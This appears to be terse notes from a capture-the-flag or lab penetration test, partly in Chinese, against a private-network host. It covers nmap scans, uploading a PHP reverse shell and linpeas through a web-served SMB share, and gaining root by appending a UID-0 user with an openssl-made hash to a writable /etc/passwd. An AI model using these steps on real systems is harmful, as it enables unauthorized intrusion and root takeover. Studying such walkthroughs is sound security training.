nmap -Pn -p- -T4 --min-rate=1000 192.168.134.91
nmap -Pn -p 22,25,80,139,445,2121,3306,8080,63525 -sCV 192.168.134.91
还是先看smb服务
查看是否有敏感文件或者可以上传的web服务的地方
经过测试,/var/www/html目录下的文件可以通过80端口的页面进行访问
上传php-reverse-shell
上传linpeas脚本枚举
/etc/passwd文件可写入
openssl passwd -1 -salt pttest 123456
echo 'pttest:$1$pttest$DOESZXlLEG3ywZIPpStUX/:0:0:root:/root:/bin/bash' >> /etc/passwd